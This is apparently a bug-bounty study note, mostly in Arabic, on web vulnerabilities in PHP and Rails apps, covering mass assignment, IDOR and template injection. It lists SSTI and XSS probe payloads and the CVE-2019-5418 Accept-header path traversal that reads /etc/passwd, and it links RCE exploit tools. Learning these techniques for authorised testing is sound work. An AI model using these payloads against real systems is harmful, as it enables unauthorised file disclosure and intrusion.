pentesting4arabs

php :https://web.facebook.com/groups/pentesting4arabs/permalink/1147252752397687/

ruby:

من الحاجات الموجوده في rails موضوع ال mass assignment و ممكن يسبب ثغرات كتير https://brakemanscanner.org/docs/warning_types/mass_assignment/

طبعا ممكن تعرفها لو لقيت ال request فيه حاجه زي user[name]=

أي ايند بوينت فيها بيانات مهمة باحولها json عادة بتجيب بيانات اكتر من المعروض في الصفحة العادية

IDORs - business logic vulns - Session Attacks

SSTI RUBY ERB

.:: Phrack Magazine ::.

Queru=fuzz > Query[a]=fuzz > Query[]a=fuzz

try paramiter polution ssti csti ssi arrayi

{{9*9}}
//9*9
$(9*9)
$(1!=0)
$({{9*9}})
%//=9*9
// 81=9*9
<? {{9*9}} ?>
[\\9*9
"\\><{{9*9}}>
<? document.write({{9*9}}); ?>
#//</>♡<script>a//lert(1);<script>

CVE-2019-5418 - File Content Disclosure on Rails

الcve باختصار انت بتغير محتوى request header اللى اسمه accept

وتخليه بالمنظر ده

Accept: ../../../../../../../../../../etc/passwd{{

وبكده هتقدر توصل LFI وتعرض ملف etc/passwd وتقدر تعمل escelate ليها وتوصلها ل RCE وتأكسبلويت بالتول دى

https://github.com/mpgn/Rails-doubletap-RCE

https://hackerone.com/reports/473888

ودول كل الريسورس اللى قدرت اوصلها :

https://github.com/mpgn/CVE-2019-5418

https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/

https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q

https://github.com/omarkurt/CVE-2019-5418

Example Report From H1 :

https://hackerone.com/reports/541858

وده لينك التمبلت بتاع cve فى nuclei

nuclei-templates/cves/2019/CVE-2019-5418.yaml at master · projectdiscovery/nuclei-templatesGitHub